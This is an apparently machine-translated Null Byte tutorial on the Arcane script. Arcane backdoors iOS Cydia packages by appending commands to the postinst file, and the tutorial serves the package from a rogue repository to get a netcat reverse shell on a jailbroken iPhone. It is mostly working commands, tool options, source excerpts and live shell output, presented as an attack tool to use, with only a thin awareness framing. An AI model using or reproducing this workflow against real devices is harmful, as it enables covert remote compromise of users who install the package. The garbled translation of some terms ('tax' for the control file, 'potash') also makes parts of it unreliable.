قالب وردپرس درنا توس
Home / Tips and Tricks / How to integrate Payloads with Arcane in iPhone packages «Null Byte :: WonderHowTo

How to integrate Payloads with Arcane in iPhone packages «Null Byte :: WonderHowTo



It is a common misconception that iPhones are insensitive to cyber attacks and “more secure” than Android. And when an iPhone is hacked, it’s almost impossible to say that it happened.

Vulnerabilities in iOS are common and Apple tries to fix them with every security update released. First, consider all CVEs released last year. As we know, Apple has released over 180 patches so far in 2020, and probably many more that haven’t been reported.

How to hack into an iPhone?

Jailbreaks released in the past decade use a variety of iOS exploits. Government agencies use unknown exploits every day to compromise iPhone. Exploit acquisition platforms like Zerodium offer up to $ 2 million to disclose private iOS vulnerabilities.

A is not shown in this article magic Simple button for accessing everyone̵

7;s iPhone. It gives readers an idea of ​​what is possible with remote access to an iPhone and why using jailbreak repositories is dangerous.

Step 1: jailbreak an iPhone

An iOS jailbroken device is required to follow this guide. I’m testing this attack against an iPhone 7 Plus with iOS 13.4.1 and an iPhone 7 with iOS 13.5. The iOS devices were jailbreaked using the unc0ver method. You can also try alternative jail breaks like Checkra1n.

Step 2: clone the Arcane repository

Arcane is a simple automation script that can put iOS packages behind the door and create the resources necessary to host Cydia repositories. I created Arcane for this article to make the process quick and accessible for beginners. Before cloning the repository, ensure that the required dependencies are installed and up to date.

~$ sudo apt-get update && sudo apt-get install -Vy bzip2 netcat-traditional dpkg coreutils git python3

[sudo] password for kali:
Get:1 http://kali.download/kali kali-rolling InRelease [30.5 kB]
Get:2 http://kali.download/kali kali-rolling/main amd64 Packages [16.7 MB]
Get:3 http://kali.download/kali kali-rolling/non-free amd64 Packages [197 kB]
Get:4 http://kali.download/kali kali-rolling/contrib amd64 Packages [96.4 kB]
Fetched 17.0 MB in 4s (3,928 kB/s)
Reading package lists... Done
Reading package lists... Done
Building dependency tree
Reading state information... Done
coreutils is already the newest version (8.30-3+b1).
dpkg is already the newest version (1.19.7kali1).
python3 is already the newest version (3.8.2-3).
python3 set to manually installed.
The following additional packages will be installed:
   git-man (1:2.27.0-1)
   libbz2-1.0 (1.0.8-3)
Suggested packages:
   bzip2-doc (1.0.8-3)
   git-daemon-run (1:2.27.0-1)
   | git-daemon-sysvinit (1:2.27.0-1)
   git-doc (1:2.27.0-1)
   git-el (1:2.27.0-1)
   git-email (1:2.27.0-1)
   git-gui (1:2.27.0-1)
   gitk (1:2.27.0-1)
   gitweb (1:2.27.0-1)
   git-cvs (1:2.27.0-1)
   git-mediawiki (1:2.27.0-1)
   git-svn (1:2.27.0-1)
The following packages will be upgraded:
   bzip2 (1.0.8-2 => 1.0.8-3)
   git (1:2.26.2-1 => 1:2.27.0-1)
   git-man (1:2.26.2-1 => 1:2.27.0-1)
   libbz2-1.0 (1.0.8-2 => 1.0.8-3)
   netcat-traditional (1.10-41.1+b1 => 1.10-45)
5 upgraded, 0 newly installed, 0 to remove and 767 not upgraded.
Need to get 8,643 kB of archives.
After this operation, 2,424 kB of additional disk space will be used.
Get:1 http://kali.download/kali kali-rolling/main amd64 bzip2 amd64 1.0.8-3 [49.2 kB]
Get:2 http://kali.download/kali kali-rolling/main amd64 libbz2-1.0 amd64 1.0.8-3 [45.7 kB]
Get:3 http://kali.download/kali kali-rolling/main amd64 netcat-traditional amd64 1.10-45 [67.5 kB]
Get:4 http://kali.download/kali kali-rolling/main amd64 git amd64 1:2.27.0-1 [6,707 kB]
Get:5 http://kali.download/kali kali-rolling/main amd64 git-man all 1:2.27.0-1 [1,774 kB]
Fetched 8,643 kB in 2s (4,982 kB/s)
apt-listchanges: Reading changelogs...
(Reading database ... 287092 files and directories currently installed.)
Preparing to unpack .../bzip2_1.0.8-3_amd64.deb ...
Unpacking bzip2 (1.0.8-3) over (1.0.8-2) ...
Preparing to unpack .../libbz2-1.0_1.0.8-3_amd64.deb ...
Unpacking libbz2-1.0:amd64 (1.0.8-3) over (1.0.8-2) ...
Setting up libbz2-1.0:amd64 (1.0.8-3) ...
(Reading database ... 287092 files and directories currently installed.)
Preparing to unpack .../netcat-traditional_1.10-45_amd64.deb ...
Unpacking netcat-traditional (1.10-45) over (1.10-41.1+b1) ...
Preparing to unpack .../git_1%3a2.27.0-1_amd64.deb ...
Unpacking git (1:2.27.0-1) over (1:2.26.2-1) ...
Preparing to unpack .../git-man_1%3a2.27.0-1_all.deb ...
Unpacking git-man (1:2.27.0-1) over (1:2.26.2-1) ...
Setting up netcat-traditional (1.10-45) ...
Setting up bzip2 (1.0.8-3) ...
Setting up git-man (1:2.27.0-1) ...
Setting up git (1:2.27.0-1) ...
Processing triggers for libc-bin (2.30-4) ...
Processing triggers for man-db (2.9.1-1) ...
Processing triggers for kali-menu (2020.2.2) ...

When this is done, clone the Arcane repository.

~$ sudo git clone https://github.com/tokyoneon/Arcane /opt/arcane

Cloning into '/opt/arcane'...
remote: Enumerating objects: 16, done.
remote: Counting objects: 100% (16/16), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 16 (delta 0), reused 16 (delta 0), pack-reused 0
Unpacking objects: 100% (16/16), 805.04 KiB | 2.95 MiB/s, done.

Recursive (-R) Change ownership to make the files accessible without root privileges.

~$ sudo chown $USER:$USER -R /opt/arcane/

Switch to the new one / opt / arcane Directory.

~$ cd /opt/arcane/

Increase the permissions of arcane.sh Script to enable execution in Kali.

~/opt/arcane$ sudo chmod +x arcane.sh

To see the available options, run Arcane with the –Help Dispute.

~/opt/arcane$ ./arcane.sh --help

[░] ./arcane.sh --input package.deb --lhost  --lport <1337>

  -i, --input   iOS package to backdoor
  -f, --file    file containing commands to exec (default: not required)
  -h, --lhost   local ip address for nc listener
  -p, --lport   local port for netcat listener (default: 1337)
  -c, --cydia   generate resources for apt/cydia repository (default: disabled)
  -n, --netcat  autostart netcat listener (default: disabled)
  -u, --udp     enable udp (default: tcp)
  -x, --noart   if you hate awesome ascii art (default: enabled)
      --help    you're looking at it

Step 3: back door an iOS package

The Arcane repository contains a “samples /” directory that contains various packages that have been compiled for the iOS architecture. Use the ls Command to display the directory content.

~/opt/arcane$ ls -la samples/

total 400
drwxr-xr-x 2 root root   4096 Aug  4 11:32 .
drwxr-xr-x 5 root root   4096 Aug  4 11:32 ..
-rw-r--r-- 1 root root 100748 Aug  4 11:32 libapt-pkg-dev_1.8.2.1-1_iphoneos-arm.deb
-rw-r--r-- 1 root root 142520 Aug  4 11:32 network-cmds_543-1_iphoneos-arm.deb
-rw-r--r-- 1 root root  76688 Aug  4 11:32 sed_4.5-1_iphoneos-arm.deb
-rw-r--r-- 1 root root  60866 Aug  4 11:32 top_39-2_iphoneos-arm.deb
-rw-r--r-- 1 root root  13810 Aug  4 11:32 whois_5.3.2-1_iphoneos-arm.deb

Taken from the official Bingner Cydia Repo, all packages can be used if you participate. Use the following command to display a complete list of available packages and to view the contents of the repository.

~/opt/arcane$ wget -qO- 'https://apt.bingner.com/dists/ios/1443.00/main/binary-iphoneos-arm/Packages'| awk -v i='https://apt.bingner.com/' '/debs//{print i $2}'

https://apt.bingner.com/debs/1443.00/3proxy_0.5.3k-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/adv-cmds_119-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/afpfs-ng_0.8.1-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/apr_1.6.3-4_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/apr-lib_1.6.3-1_iphoneos-arm.deb
...
https://apt.bingner.com/debs/1443.00/xt_1.1.5-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/xtrans_1.3.5-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/xz_5.2.4-4_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/zip_2.32-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/zsh_5.7.1-3_iphoneos-arm.deb

Easy wget the package of your choice. This walkthrough uses a package that is in the samples / directory. Use the following arcane Command to backdoor the package.

~/opt/arcane$ ./arcane.sh --input samples/whois_5.3.2-1_iphoneos-arm.deb --lhost 172.16.16.1 --lport 20001 --cydia --netcat

  ░█████╗░██████╗░░█████╗░░█████╗░███╗░░██╗███████╗
  ██╔══██╗██╔══██╗██╔══██╗██╔══██╗████╗░██║██╔════╝
  ███████║██████╔╝██║░░╚═╝███████║██╔██╗██║█████╗░░
  ██╔══██║██╔══██╗██║░░██╗██╔══██║██║╚████║██╔══╝░░
  ██║░░██║██║░░██║╚█████╔╝██║░░██║██║░╚███║███████╗
  ╚═╝░░╚═╝╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝╚═╝░░╚══╝╚══════╝
                 v0.1 by @tokyoneon_

Below is a brief description of each argument. In the following GIF you can see a package in action.

  • –Entrance: This argument defines the file path to the desired package to the back door.
  • – host: Defined as the attacker’s IP address, the lhost (or localhost) is a required argument. It tells the backdoor package where Kali is on the network. In this case my potash system is on 172.16.16.1.
  • –port: Defined as an arbitrary value of 20001, the lport (or local port) tells the backdoor package where the Netcat monitoring port is located.
  • – Cydia: This argument tells Arcane to generate the files necessary to host a Cydia repository.
  • –netcat: This argument tells Arcane to automatically start a Netcat listener with the specified protocol and port.

Once the process is complete, the Arcane terminal can no longer be used because the Netcat listener is waiting for an incoming connection.

Step 4: host the repository resources

Open a new terminal in Kali and show the contents of the / tmp / cydia Directory. Note the backdoor package.

~$ ls -la /tmp/cydia/

-rw-r--r--  1 root root    29 Jul 29 14:44 index.html
-rw-r--r--  1 root root   639 Jul 29 14:44 Packages
-rw-r--r--  1 root root   494 Jul 29 14:44 Packages.bz2
-rw-r--r--  1 root root   143 Jul 29 14:44 Release
-rw-r--r--  1 root root 14064 Jul 29 14:44 whois_5.3.2-1_iphoneos-arm_BACKDOORED.deb

Change to the directory and start a simple one python3 Server to make the files accessible to other devices (e.g. an iPhone) on the same network.

~$ cd /tmp/cydia; sudo python3 -m http.server 80

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Step 5: add the repository to Cydia

Make sure that the jailbroken iOS device and the Kali system are on the same Wi-Fi network. Then open the Cydia app and navigate to the “Sources” tab. Select the “Edit” button in the top right and then the “Add” button in the top left.

If you are prompted for a URL, enter the IP address of the Kali system on which the Python server is located. Make sure you remove the httpS. in the url as cydia will try to add it by default. Select “Add Source” to add it as a repository. Finally, select “Back to Cydia” to find the newly added repository.

Step 6: install the backdoor package

Select the repository to find the backdoor package. Make sure that the Arcane terminal in Kali is still listening, then select “Install” and “Confirm” in Cydia. Cydia installs the package and executes the embedded user data.

How Arcane Works

In the Arcane terminal, successful command execution results in an “arcane>” shell prompt. Use sw_vers and your name to display the operating system and kernel versions.

[░] /usr/bin/nc -v -l -p 20001
[░] starting netcat listener on port 20001 with tcp
listening on [any] 20001 ...
172.16.16.25: inverse host lookup failed: Unknown host
connect to [172.16.16.1] from (UNKNOWN) [172.16.16.25] 56050

arcane> sw_vers
ProductName:    iPhone OS
ProductVersion: 13.4.1
BuildVersion:   17E262
arcane> uname -a
Darwin iPhone 19.4.0 Darwin Kernel Version 19.4.0: Mon Feb 24 22:04:12 PST 2020; root:xnu-6153.102.3~1/RELEASE_ARM64_T8010 iPhone9,4 arm64 D111AP Darwin
arcane>

At this point, various post-exploitation attacks are possible, but let’s talk about what Arcane did. In the GIF shown in step 3, some things happen.

In Kali, decompress the whois package just installed on the iOS device.

~$ dpkg-deb -R /tmp/cydia/whois_5.3.2-1_iphoneos-arm_BACKDOORED.deb /tmp/whois-decomp

Use tree to display the directory content. Note the directory “DEBIAN”, which contains a file “control” and “postinst”. Both files are important for Cydia to index packages and execute commands during installation.

~$ tree /tmp/whois-decomp/

/tmp/whois-decomp/
├── DEBIAN
│   ├── control
│   └── postinst
└── usr
    └── bin
        └── whois

The “tax” file (also called “tax data”) contains values ​​that package management tools like dpkg Use this option when installing packages. Arcane either changes an existing control file or creates it.

# The "control" file template. Most iOS packages will include a
# control file. In the event one is not found, Arcane will use the
# below template. The `$hacker` variable is used here to occupy
# various arbitrary fields.
# https://www.debian.org/doc/manuals/maint-guide/dreq.en.html
controlTemp="Package: com.$hacker.backdoor
Name: $hacker backdoor
Version: 1337
Section: app
Architecture: iphoneos-arm
Description: A backdoored iOS package
Author: $hacker 
Maintainer: $hacker ";

...

# An `if` statement to check for the control file.
if [[ ! -f "$tmp/DEBIAN/control" ]]; then
    # If no control is detected, create it using the template.
    echo "$controlTemp" > "$tmp/DEBIAN/control";
    status "created control file" "error with control template";
else
    # If a control file exists, Arcane will simply rename the package
    # as it appears in the list of available Cydia applications. This
    # makes the package easier to location in Cydia.
    msg "detected control file" succ;
    sed -i '0,/^Name:.*/s//Name: $hacker backdoor/' "$tmp/DEBIAN/control";
    status "modified control file" "error with control";
fi;

It is possible to deploy scripts as part of a package when applications are installed, updated, or removed. The package backup scripts include the files preinst, postinst, prerm and postrm. Arcane uses the “postinst” file to execute commands during installation.

# The "post-installation" file. This file is generally responsible
# for executing commands on the OS after installing the required
# files. It's utilized by developers to manage and maintain various
# aspects of an installation. Arcane abuses this functionality by
# appending malicious Bash commands to the bottom of the file.
postinst="$tmp/DEBIAN/postinst";

# A function to handle the type of command execution embedded into the
# postinst file.
function inject_backdoor ()
{
    # If --file is used, `cat` the command(s) into the postinst file.
    if [[ "$infile" ]]; then
        cat "$infile" >> "$postinst";
        embed="[$infile]";
    else
        # If no --file, utilize the simple Bash payload, previously
        # defined.
        echo -e "$payload" >> "$postinst";
        embed="generic shell command";
    fi;
    status "embedded $embed into postinst" "error embedding backdoor";
    chmod 0755 "$postinst"
};

Readers are encouraged to review the Arcane Source to better understand the underlined commands.

iOS attacks after exploitation

Apple’s iOS and MacOS are similar. Both operating systems are derivatives of FreeBSD, and there is overlap when setting up the systems, e.g. B. launchctl, the keychain and the file system structure.

However, readers will immediately notice that wget, ifconfig, curl, netstat and other known commands are not available as these binaries are not installed in iOS by default. For more information, see Zero Bytes. There I will explain the workarounds for missing commands and attacks after exploitation in more detail.

Follow me on Twitter @tokyoneon_ and GitHub to stay up to date on my current projects. And if you have any questions or concerns, leave a comment or ping me on Twitter.

Would you like to make money as a hacker with a white hat? Start your white hat hacking career with our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and get over 60 hours of training from ethical hacking professionals.

Buy now (90% discount)>

Cover picture, screenshots and GIF of tokyoneon / zero byte




Source link